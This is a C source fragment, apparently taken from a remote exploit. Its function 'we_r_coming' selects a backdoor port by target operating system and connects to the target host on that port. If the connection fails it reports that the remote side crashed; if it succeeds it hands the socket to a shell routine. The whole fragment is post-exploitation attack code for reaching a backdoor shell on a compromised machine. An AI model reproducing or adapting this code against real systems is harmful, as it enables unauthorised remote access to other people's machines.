
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; int sin_zero; } ;
struct sockaddr {int dummy; } ;
typedef int rem_addr ;


 int AF_INET ;
 short BACKDOOR ;
 short BSDBACKDOOR ;
 int IPPROTO_TCP ;
 int NPRINTINFO (int ) ;
 int REMCRASHED ;
 int SOCK_STREAM ;
 int SOL_SOCKET ;
 int SO_REUSEADDR ;
 short WINBACKDOOR ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr const*,int) ;
 int exit (int) ;
 int get_host_ip (char*) ;
 int htons (short) ;
 int id ;
 int memset (int *,char,int) ;
 int perror (char*) ;
 scalar_t__ setsockopt (int,int ,int ,char*,int) ;
 int shell (int) ;
 int sleep (int) ;
 int socket (int ,int ,int ) ;

void we_r_coming(char* hostname)
{
       int sock;
       int yes;
       short port;
       struct sockaddr_in rem_addr;

           port = BACKDOOR;
           if(id == 6){
           port = WINBACKDOOR;
           }
           if(id == 2 || id == 10 || id == 11){
           port = BSDBACKDOOR;
           }
           sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
           if(sock < 0)
            {
            perror("socket");
            exit(1);
            }

          if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
            perror("setsockopt");
            close(sock);
            exit(1);
            }

                 memset(&(rem_addr.sin_zero),'\0',8);
                 rem_addr.sin_family = AF_INET;
                 rem_addr.sin_port = htons(port);
                 rem_addr.sin_addr.s_addr = get_host_ip(hostname);

                    sleep(4);
                    if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
                      NPRINTINFO(REMCRASHED);
                      close(sock);
                      exit(1);
                      }
                 shell(sock);
exit(0);
}
